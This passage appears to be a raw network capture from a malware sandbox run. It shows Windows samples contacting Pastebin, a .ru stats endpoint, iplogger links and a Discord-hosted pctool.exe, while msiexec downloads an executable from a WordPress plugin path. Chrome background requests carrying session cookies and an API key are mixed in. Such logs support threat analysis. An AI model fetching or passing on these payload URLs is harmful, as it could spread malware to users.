                              ogads-pa.googleapis.com
                              IN A
                              142.250.178.10
                              ogads-pa.googleapis.com
                              IN A
                              216.58.213.10
                              ogads-pa.googleapis.com
                              IN A
                              216.58.212.234
                            • flag-us
                              DNS
                              apis.google.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              apis.google.com
                              IN A
                              Response
                              apis.google.com
                              IN CNAME
                              plus.l.google.com
                              plus.l.google.com
                              IN A
                              216.58.201.110
                            • flag-gb
                              OPTIONS
                              https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
                              chrome.exe
                              Remote address:
                              142.250.187.234:443
                              Request
                              OPTIONS /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
                              host: ogads-pa.googleapis.com
                              accept: */*
                              access-control-request-method: POST
                              access-control-request-headers: content-type,x-goog-api-key,x-user-agent
                              origin: chrome-untrusted://new-tab-page
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              sec-fetch-mode: cors
                              sec-fetch-site: cross-site
                              sec-fetch-dest: empty
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-gb
                              POST
                              https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
                              chrome.exe
                              Remote address:
                              142.250.187.234:443
                              Request
                              POST /$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData HTTP/2.0
                              host: ogads-pa.googleapis.com
                              content-length: 69
                              sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                              x-user-agent: grpc-web-javascript/0.1
                              x-goog-api-key: AIzaSyCbsbvGCe7C9mCtdaTycZB2eUFuzsYKG_E
                              content-type: application/json+protobuf
                              sec-ch-ua-mobile: ?0
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              accept: */*
                              origin: chrome-untrusted://new-tab-page
                              x-client-data: CIvdygE=
                              sec-fetch-site: cross-site
                              sec-fetch-mode: cors
                              sec-fetch-dest: empty
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-gb
                              GET
                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0
                              chrome.exe
                              Remote address:
                              216.58.201.110:443
                              Request
                              GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/2.0
                              host: apis.google.com
                              sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                              sec-ch-ua-mobile: ?0
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              accept: */*
                              x-client-data: CIvdygE=
                              sec-fetch-site: cross-site
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: script
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                              cookie: __Secure-ENID=22.SE=PCPQpwWqMko9mKMOR2HB0atl45SzUwCs7WjxBtaV9v7LfmS_Tv_kFhxd2qC5bN9hlqz8Tu6vgSlqGkHvyVzkvP-sNzLu_OISPeiMvfsv-emMwRhTzqSplGLxLZQblUJnRtx_k2_pM4OgmgilXwqFvlMcTYnmIB2PoiOQ3XjSO0kTu0cyeSla5nKGt0jfNdwLnA
                            • flag-us
                              DNS
                              234.187.250.142.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              234.187.250.142.in-addr.arpa
                              IN PTR
                              Response
                              234.187.250.142.in-addr.arpa
                              IN PTR
                              lhr25s34-in-f101e100net
                            • flag-us
                              DNS
                              110.201.58.216.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              110.201.58.216.in-addr.arpa
                              IN PTR
                              Response
                              110.201.58.216.in-addr.arpa
                              IN PTR
                              lhr48s48-in-f141e100net
                              110.201.58.216.in-addr.arpa
                              IN PTR
                              prg03s02-in-f110�I
                              110.201.58.216.in-addr.arpa
                              IN PTR
                              prg03s02-in-f14�I
                            • flag-us
                              DNS
                              play.google.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              play.google.com
                              IN A
                              Response
                              play.google.com
                              IN A
                              172.217.16.238
                            • flag-gb
                              POST
                              https://play.google.com/log?format=json&hasfast=true
                              chrome.exe
                              Remote address:
                              172.217.16.238:443
                              Request
                              POST /log?format=json&hasfast=true HTTP/2.0
                              host: play.google.com
                              content-length: 1421
                              sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                              sec-ch-ua-platform: "Windows"
                              sec-ch-ua-mobile: ?0
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              content-type: application/x-www-form-urlencoded;charset=UTF-8
                              accept: */*
                              origin: chrome-untrusted://new-tab-page
                              x-client-data: CIvdygE=
                              sec-fetch-site: cross-site
                              sec-fetch-mode: cors
                              sec-fetch-dest: empty
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                              cookie: __Secure-ENID=22.SE=PCPQpwWqMko9mKMOR2HB0atl45SzUwCs7WjxBtaV9v7LfmS_Tv_kFhxd2qC5bN9hlqz8Tu6vgSlqGkHvyVzkvP-sNzLu_OISPeiMvfsv-emMwRhTzqSplGLxLZQblUJnRtx_k2_pM4OgmgilXwqFvlMcTYnmIB2PoiOQ3XjSO0kTu0cyeSla5nKGt0jfNdwLnA
                            • flag-us
                              DNS
                              telegka.top
                              Tue200ab8d408d.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              telegka.top
                              IN A
                              Response
                              telegka.top
                              IN A
                              107.178.223.183
                              telegka.top
                              IN A
                              104.155.138.21
                            • flag-us
                              DNS
                              clients2.google.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              clients2.google.com
                              IN A
                              Response
                              clients2.google.com
                              IN CNAME
                              clients.l.google.com
                              clients.l.google.com
                              IN A
                              142.250.178.14
                            • flag-gb
                              GET
                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D30%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D30%2526e%253D1
                              chrome.exe
                              Remote address:
                              142.250.178.14:443
                              Request
                              GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D30%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D30%2526e%253D1 HTTP/2.0
                              host: clients2.google.com
                              sec-fetch-site: none
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: empty
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                              cookie: __Secure-ENID=23.SE=F-Kc8i5SXjKzvSyGP3TgyzKCbDas0JX_imtMG-KP-nooodQY0jnOY88Ky-Cyudo95sLTZhIPh_F8-yIl0uls_pfEOpQKYp1vCTPluld_uZrHb__QP31XzQAzrr04A4eyINmo5Anl8nMcwGjK6oKBwAgF35DG-9Sdjo2UXmSkLXkbXsLdm1D-_lQrqronRjLqMZF3FEsM
                            • flag-us
                              DNS
                              238.16.217.172.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              238.16.217.172.in-addr.arpa
                              IN PTR
                              Response
                              238.16.217.172.in-addr.arpa
                              IN PTR
                              mad08s04-in-f141e100net
                              238.16.217.172.in-addr.arpa
                              IN PTR
                              lhr48s28-in-f14�I
                            • flag-us
                              DNS
                              14.178.250.142.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              14.178.250.142.in-addr.arpa
                              IN PTR
                              Response
                              14.178.250.142.in-addr.arpa
                              IN PTR
                              lhr48s27-in-f141e100net
                            • flag-us
                              DNS
                              clients2.googleusercontent.com
                              chrome.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              clients2.googleusercontent.com
                              IN A
                              Response
                              clients2.googleusercontent.com
                              IN CNAME
                              googlehosted.l.googleusercontent.com
                              googlehosted.l.googleusercontent.com
                              IN A
                              216.58.213.1
                            • flag-gb
                              GET
                              https://clients2.googleusercontent.com/crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx
                              chrome.exe
                              Remote address:
                              216.58.213.1:443
                              Request
                              GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/2.0
                              host: clients2.googleusercontent.com
                              sec-fetch-site: none
                              sec-fetch-mode: no-cors
                              sec-fetch-dest: empty
                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                              accept-encoding: gzip, deflate, br, zstd
                              accept-language: en-US,en;q=0.9
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              1.213.58.216.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              1.213.58.216.in-addr.arpa
                              IN PTR
                              Response
                              1.213.58.216.in-addr.arpa
                              IN PTR
                              lhr25s25-in-f11e100net
                              1.213.58.216.in-addr.arpa
                              IN PTR
                              ber01s14-in-f1�F
                            • flag-us
                              DNS
                              pastebin.com
                              Tue202dc71d1d41.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              pastebin.com
                              IN A
                              Response
                              pastebin.com
                              IN A
                              172.67.19.24
                              pastebin.com
                              IN A
                              104.20.4.235
                              pastebin.com
                              IN A
                              104.20.3.235
                            • flag-us
                              GET
                              https://pastebin.com/raw/A7dSG1te
                              Tue202dc71d1d41.exe
                              Remote address:
                              172.67.19.24:443
                              Request
                              GET /raw/A7dSG1te HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                              Host: pastebin.com
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:27:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              x-frame-options: DENY
                              x-frame-options: DENY
                              x-content-type-options: nosniff
                              x-content-type-options: nosniff
                              x-xss-protection: 1;mode=block
                              x-xss-protection: 1;mode=block
                              cache-control: public, max-age=1801
                              CF-Cache-Status: HIT
                              Age: 6
                              Server: cloudflare
                              CF-RAY: 8de722b7edd960fe-LHR
                            • flag-us
                              DNS
                              wfsdragon.ru
                              Tue202dc71d1d41.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              wfsdragon.ru
                              IN A
                              Response
                              wfsdragon.ru
                              IN A
                              172.67.133.215
                              wfsdragon.ru
                              IN A
                              104.21.5.208
                            • flag-us
                              GET
                              http://wfsdragon.ru/api/setStats.php
                              Tue202dc71d1d41.exe
                              Remote address:
                              172.67.133.215:80
                              Request
                              GET /api/setStats.php HTTP/1.1
                              Connection: Keep-Alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
                              Host: wfsdragon.ru
                              Response
                              HTTP/1.1 404 Not Found
                              Date: Wed, 06 Nov 2024 18:27:05 GMT
                              Content-Type: text/html; charset=iso-8859-1
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zBXN3q5U474y7YyI2EDx0lY4kITsBgjfnuLFpLrsNYp4hDZe1YlikKR7PQ%2BRmdR7w2i75%2FANLHBOW3KwyNzQ7UpRYnSzJBjjygvQgXUfzl05Q5AEenLRdudhI9u5VZ4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8de722b8ee519508-LHR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=41635&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=206&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                            • flag-us
                              DNS
                              24.19.67.172.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              24.19.67.172.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              215.133.67.172.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              215.133.67.172.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              t.gogamec.com
                              Tue20ea834764a6.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              t.gogamec.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              136.32.126.40.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              136.32.126.40.in-addr.arpa
                              IN PTR
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              futurepreneurs.eu
                              msiexec.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              futurepreneurs.eu
                              IN A
                              Response
                              futurepreneurs.eu
                              IN A
                              92.61.37.60
                            • flag-us
                              DNS
                              futurepreneurs.eu
                              msiexec.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              futurepreneurs.eu
                              IN A
                              Response
                              futurepreneurs.eu
                              IN A
                              92.61.37.60
                            • flag-lt
                              GET
                              https://futurepreneurs.eu/wp-content/plugins/dn-events/Dv31BrowInst.exe
                              msiexec.exe
                              Remote address:
                              92.61.37.60:443
                              Request
                              GET /wp-content/plugins/dn-events/Dv31BrowInst.exe HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                              Host: futurepreneurs.eu
                              Connection: Keep-Alive
                              Response
                              HTTP/1.1 403 Forbidden
                              Server: nginx
                              Date: Wed, 06 Nov 2024 18:27:37 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              Vary: Accept-Encoding
                              Content-Encoding: gzip
                            • flag-us
                              DNS
                              32.169.19.2.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              32.169.19.2.in-addr.arpa
                              IN PTR
                              Response
                              32.169.19.2.in-addr.arpa
                              IN PTR
                              a2-19-169-32deploystaticakamaitechnologiescom
                            • flag-us
                              DNS
                              60.37.61.92.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              60.37.61.92.in-addr.arpa
                              IN PTR
                              Response
                              60.37.61.92.in-addr.arpa
                              IN PTR
                              ltvnsplsk60hostexlt
                            • flag-us
                              DNS
                              60.37.61.92.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              60.37.61.92.in-addr.arpa
                              IN PTR
                              Response
                              60.37.61.92.in-addr.arpa
                              IN PTR
                              ltvnsplsk60hostexlt
                            • flag-us
                              DNS
                              r11.o.lencr.org
                              msiexec.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              r11.o.lencr.org
                              IN A
                              Response
                              r11.o.lencr.org
                              IN CNAME
                              o.lencr.edgesuite.net
                              o.lencr.edgesuite.net
                              IN CNAME
                              a1887.dscq.akamai.net
                              a1887.dscq.akamai.net
                              IN A
                              2.23.210.82
                              a1887.dscq.akamai.net
                              IN A
                              2.23.210.75
                            • flag-gb
                              GET
                              http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSIsOGkgwGcfsYBBl1dpdGBWQ%3D%3D
                              msiexec.exe
                              Remote address:
                              2.23.210.82:80
                              Request
                              GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgSIsOGkgwGcfsYBBl1dpdGBWQ%3D%3D HTTP/1.1
                              Connection: Keep-Alive
                              Accept: */*
                              User-Agent: Microsoft-CryptoAPI/10.0
                              Host: r11.o.lencr.org
                              Response
                              HTTP/1.1 200 OK
                              Server: nginx
                              Content-Type: application/ocsp-response
                              Content-Length: 504
                              ETag: "F3D88F2B619F9A69AE05BF2F58F4E2A924DDC87F6E17D7937B7D9690A7935BBB"
                              Last-Modified: Wed, 06 Nov 2024 15:32:00 UTC
                              Cache-Control: public, no-transform, must-revalidate, max-age=11092
                              Expires: Wed, 06 Nov 2024 21:32:29 GMT
                              Date: Wed, 06 Nov 2024 18:27:37 GMT
                              Connection: keep-alive
                            • flag-us
                              DNS
                              www.qxsgxd.com
                              msiexec.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              www.qxsgxd.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              82.210.23.2.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              82.210.23.2.in-addr.arpa
                              IN PTR
                              Response
                              82.210.23.2.in-addr.arpa
                              IN PTR
                              a2-23-210-82deploystaticakamaitechnologiescom
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              69.190.18.2.in-addr.arpa
                              Remote address:
                              8.8.8.8:53
                              Request
                              69.190.18.2.in-addr.arpa
                              IN PTR
                              Response
                              69.190.18.2.in-addr.arpa
                              IN PTR
                              a2-18-190-69deploystaticakamaitechnologiescom
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • flag-us
                              DNS
                              s.lletlee.com
                              Tue20d8f1968de62f282.exe
                              Remote address:
                              8.8.8.8:53
                              Request
                              s.lletlee.com
                              IN A
                              Response
                            • 45.133.1.107:80
                              Tue202dc71d1d41.exe
                              260 B
                              5
                            • 45.133.1.107:80
                              Tue2076b72c2666aa9c.exe
                              260 B
                              5
                            • 52.203.72.196:443
                              www.listincode.com
                              Tue2095db5b6bd7.exe
                              260 B
                              200 B
                              5
                              5
                            • 162.159.135.233:443
                              https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe
                              tls, http
                              Tue20abd30733a17.exe
                              6.6kB
                              36.3kB
                              60
                              49

                              HTTP Request

                              GET https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe

                              HTTP Response

                              404

                              HTTP Request

                              GET https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe

                              HTTP Response

                              404

                              HTTP Request

                              GET https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe

                              HTTP Response

                              404

                              HTTP Request

                              GET https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe

                              HTTP Response

                              404

                              HTTP Request

                              GET https://cdn.discordapp.com/attachments/897184039432257628/900114690296914032/pctool.exe

                              HTTP Response

                              404
                            • 104.26.3.46:443
                              https://iplogger.org/1a2jd7
                              tls, http
                              Tue203dd57461.exe
                              1.0kB
                              13.9kB
                              14
                              20

                              HTTP Request

                              GET https://iplogger.org/1a2jd7

                              HTTP Response

                              403
                            • 104.26.3.46:443
                              https://iplogger.org/1a3jd7
                              tls, http
                              Tue203dd57461.exe
                              1.1kB
                              14.1kB
                              13
                              18

                              HTTP Request

                              GET https://iplogger.org/1a3jd7

                              HTTP Response

                              403
                            • 54.84.177.46:443
                              www.listincode.com
                              Tue2095db5b6bd7.exe
                              260 B
                              200 B
                              5
                              5
                            • 91.121.67.60:2151
                              Tue207c76c7f37.exe
                              260 B
                              5
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 104.26.3.46:443
                              https://iplogger.org/1mxKf7
                              tls, http
                              Tue2095db5b6bd7.exe
                              1.5kB
                              14.8kB
                              21
                              18

                              HTTP Request

                              GET https://iplogger.org/1mxKf7

                              HTTP Response

                              403
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 142.250.187.227:80
                              http://c.pki.goog/r/r4.crl
                              http
                              Tue2095db5b6bd7.exe
                              556 B
                              3.8kB
                              7
                              5

                              HTTP Request

                              GET http://c.pki.goog/r/gsr1.crl

                              HTTP Response

                              200

                              HTTP Request

                              GET http://c.pki.goog/r/r4.crl

                              HTTP Response

                              200
                            • 45.9.20.13:80
                              Tue2082eedf21.exe
                              208 B
                              4
                            • 194.104.136.5:46013
                              Tue2082ea84bd.exe
                              260 B
                              200 B
                              5
                              5
                            • 13.251.16.150:80
                              http://www.iyiqian.com/
                              http
                              Tue2095db5b6bd7.exe
                              469 B
                              870 B
                              6
                              5

                              HTTP Request

                              GET http://www.iyiqian.com/

                              HTTP Response

                              200
                            • 135.181.129.119:4805
                              Tue20c79bfdadc.exe
                              260 B
                              200 B
                              5
                              5
                            • 142.250.179.228:443
                              www.google.com
                              tls
                              chrome.exe
                              966 B
                              4.5kB
                              8
                              6
                            • 142.250.179.228:443
                              https://www.google.com/async/newtab_promos
                              tls, http2
                              chrome.exe
                              3.1kB
                              45.9kB
                              43
                              43

                              HTTP Request

                              GET https://www.google.com/async/ddljson?async=ntp:2

                              HTTP Request

                              GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                              HTTP Request

                              GET https://www.google.com/async/newtab_promos
                            • 142.250.179.228:443
                              www.google.com
                              tls, http2
                              chrome.exe
                              999 B
                              5.5kB
                              9
                              8
                            • 142.250.187.234:443
                              https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
                              tls, http2
                              chrome.exe
                              2.4kB
                              7.4kB
                              16
                              17

                              HTTP Request

                              OPTIONS https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData

                              HTTP Request

                              POST https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData
                            • 216.58.201.110:443
                              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0
                              tls, http2
                              chrome.exe
                              3.1kB
                              47.5kB
                              37
                              40

                              HTTP Request

                              GET https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0
                            • 172.217.16.238:443
                              https://play.google.com/log?format=json&hasfast=true
                              tls, http2
                              chrome.exe
                              3.5kB
                              8.8kB
                              15
                              14

                              HTTP Request

                              POST https://play.google.com/log?format=json&hasfast=true
                            • 142.250.178.14:443
